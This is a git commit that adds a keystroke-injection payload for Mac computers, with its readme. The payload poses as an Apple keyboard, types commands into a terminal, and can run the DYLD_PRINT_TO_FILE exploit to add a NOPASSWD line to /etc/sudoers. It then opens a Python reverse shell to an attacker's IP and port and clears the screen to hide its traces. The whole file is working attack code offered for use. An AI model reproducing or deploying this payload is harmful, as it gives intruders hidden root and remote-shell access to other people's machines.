Merge pull request #52 from mrt0mat0/MRS

Add Mac Reverse Shell payload
2025-10-29 16:58:12 +00:00 · 2017-03-14 13:48:03 +11:00 · 2017-03-14 13:48:03 +11:00 · 1e8406bc38
commit 1e8406bc38
parent 00927dc04c 70af321846
2 changed files with 70 additions and 0 deletions
--- a/payloads/library/MacReverseShell/payload.txt
+++ b/payloads/library/MacReverseShell/payload.txt
@ -0,0 +1,49 @@
+LED B
+#Set your Variables, bro
+DYLD_ROOT=true
+LHOST=192.168.17.12
+LPORT=4444
+
+LANGUAGE='us'
+
+# Gimme a Keyboard please. Thanks.
+ATTACKMODE HID VID_0X05AC PID_0X021E
+LED R G B
+
+# Get a terminal
+QUACK DELAY 400
+QUACK GUI SPACE
+QUACK DELAY 300
+QUACK STRING terminal
+QUACK DELAY 200
+QUACK ENTER
+QUACK DELAY 400
+
+# optional DYLD exploit script
+if $DYLD_ROOT; then
+ LED R
+ QUACK SPACE
+ QUACK STRING echo \'echo \"\$\(whoami\) ALL=\(ALL\) NOPASSWD\:ALL\" \>\&3\' \| DYLD_PRINT_TO_FILE=\/etc\/sudoers newgrp\; sudo -s
+ QUACK ENTER
+ QUACK DELAY 200
+ QUACK ENTER
+ QUACK ENTER
+ QUACK ENTER
+ QUACK ENTER
+ QUACK DELAY 200
+fi
+
+# python reverse shell
+QUACK SPACE
+QUACK STRING \(python -c \'import sys,socket,os,pty\; \_,ip,port=sys.argv\; s=socket.socket\(\)\; s.connect\(\(ip,int\(port\)\)\)\; [os.dup2\(s.fileno\(\),fd\) for fd in \(0,1,2\)]\; pty.spawn\(\"\/bin\/bash\"\)\' $LHOST $LPORT \&\)
+QUACK ENTER
+QUACK DELAY 200
+QUACK SPACE
+QUACK STRING clear
+QUACK ENTER
+QUACK GUI q
+QUACK DELAY 100
+QUACK ENTER
+
+# Green is the official Light of "finished"
+LED G
--- a/payloads/library/MacReverseShell/readme.md
+++ b/payloads/library/MacReverseShell/readme.md
@ -0,0 +1,21 @@
+# Mac Reverse Shell
+
+Author: mrt0mat0
+Version: Version 1.0
+
+## Description
+
+Using ducky script, it opens a python reverse shell to the IP and PORT of your choosing. Also, as a nice little bonus, it runs the DYLD exploit that, if vulnerable will give you a root shell. 
+
+## Configuration
+
+This is configured for Macbooks as a keyboard. I am not 100% about how the VID and PID variables work, so that may just be BS at the top :) - That's what github is for. Exploit does not work on updated macs
+
+## STATUS
+
+| LED              | Status                                |
+| ---------------- | ------------------------------------- |
+| Blue             | Setup                                 |
+| White            | Running the scripts                   |
+| Red              | r00t exploit is running (optional     |
+| Green            | Finished                              |